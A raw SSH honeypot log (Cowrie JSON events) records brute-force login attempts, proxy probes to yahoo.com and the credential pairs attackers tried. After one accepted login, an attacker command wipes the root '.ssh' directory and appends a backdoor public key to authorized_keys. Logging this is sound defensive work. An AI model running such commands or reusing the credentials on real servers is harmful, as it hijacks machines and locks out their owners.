{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:08.897561Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48572,"dst_ip":"1.2.3.4","dst_port":22,"session":"f70b071b4846","protocol":"ssh","message":"New connection: 212.227.235.229:48572 (1.2.3.4:22) [session: f70b071b4846]","sensor":"my-vps","timestamp":"2025-08-26T03:41:09.144685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:09.145528Z","src_ip":"212.227.235.229","session":"f70b071b4846"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:09.391784Z","src_ip":"212.227.235.229","session":"f70b071b4846"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:41:10.418490Z","src_ip":"212.227.235.229","session":"f70b071b4846"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:11.666821Z","src_ip":"212.227.235.229","session":"f70b071b4846"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48586,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7e4c061414b","protocol":"ssh","message":"New connection: 212.227.235.229:48586 (1.2.3.4:22) [session: a7e4c061414b]","sensor":"my-vps","timestamp":"2025-08-26T03:41:11.911276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:11.911907Z","src_ip":"212.227.235.229","session":"a7e4c061414b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:12.161433Z","src_ip":"212.227.235.229","session":"a7e4c061414b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:41:13.191238Z","src_ip":"212.227.235.229","session":"a7e4c061414b"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:13.439504Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:13.440303Z","src_ip":"212.227.235.229","session":"a7e4c061414b"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":43866,"dst_ip":"1.2.3.4","dst_port":22,"session":"80b5af6d7f3e","protocol":"ssh","message":"New connection: 68.183.87.241:43866 (1.2.3.4:22) [session: 80b5af6d7f3e]","sensor":"my-vps","timestamp":"2025-08-26T03:41:19.833792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:19.834808Z","src_ip":"68.183.87.241","session":"80b5af6d7f3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:20.094145Z","src_ip":"68.183.87.241","session":"80b5af6d7f3e"}
{"eventid":"cowrie.login.failed","username":"ark","password":"ark","message":"login attempt [ark/ark] failed","sensor":"my-vps","timestamp":"2025-08-26T03:41:21.172039Z","src_ip":"68.183.87.241","session":"80b5af6d7f3e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:22.450985Z","src_ip":"68.183.87.241","session":"80b5af6d7f3e"}
{"eventid":"cowrie.session.connect","src_ip":"81.45.181.135","src_port":51672,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cfd5cb602b8","protocol":"ssh","message":"New connection: 81.45.181.135:51672 (1.2.3.4:22) [session: 6cfd5cb602b8]","sensor":"my-vps","timestamp":"2025-08-26T03:41:38.901990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:38.902639Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:38.963902Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456...","message":"login attempt [root/Aa123456...] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.244276Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:41:39.418837Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.419678Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.421287Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.482473Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:41:39.619532Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.620192Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.682240Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.683142Z","src_ip":"81.45.181.135","session":"6cfd5cb602b8"}
{"eventid":"cowrie.session.connect","src_ip":"81.45.181.135","src_port":52808,"dst_ip":"1.2.3.4","dst_port":22,"session":"f34523035e24","protocol":"ssh","message":"New connection: 81.45.181.135:52808 (1.2.3.4:22) [session: f34523035e24]","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.736387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.737354Z","src_ip":"81.45.181.135","session":"f34523035e24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:39.793073Z","src_ip":"81.45.181.135","session":"f34523035e24"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.055299Z","src_ip":"81.45.181.135","session":"f34523035e24"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19283,"dst_ip":"1.2.3.4","dst_port":22,"session":"082bf0d5705d","protocol":"ssh","message":"New connection: 213.209.150.239:19283 (1.2.3.4:22) [session: 082bf0d5705d]","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.743432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.744114Z","src_ip":"213.209.150.239","session":"082bf0d5705d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9517,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84f741466f2","protocol":"ssh","message":"New connection: 212.227.235.229:9517 (1.2.3.4:22) [session: b84f741466f2]","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.769694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.770557Z","src_ip":"212.227.235.229","session":"b84f741466f2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.791285Z","src_ip":"213.209.150.239","session":"082bf0d5705d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T03:41:40.899512Z","src_ip":"212.227.235.229","session":"b84f741466f2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.025633Z","src_ip":"213.209.150.239","session":"082bf0d5705d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26676,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26676","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.074203Z","session":"082bf0d5705d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.112084Z","src_ip":"81.45.181.135","session":"f34523035e24"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.121139Z","src_ip":"213.209.150.239","session":"082bf0d5705d"}
{"eventid":"cowrie.session.connect","src_ip":"81.45.181.135","src_port":52966,"dst_ip":"1.2.3.4","dst_port":22,"session":"f41ea600872c","protocol":"ssh","message":"New connection: 81.45.181.135:52966 (1.2.3.4:22) [session: f41ea600872c]","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.165413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.166305Z","src_ip":"81.45.181.135","session":"f41ea600872c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.220589Z","src_ip":"81.45.181.135","session":"f41ea600872c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9993,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9993","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.257538Z","session":"082bf0d5705d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.304844Z","src_ip":"213.209.150.239","session":"082bf0d5705d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.352784Z","src_ip":"213.209.150.239","session":"082bf0d5705d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:41:41.477972Z","src_ip":"81.45.181.135","session":"f41ea600872c"}
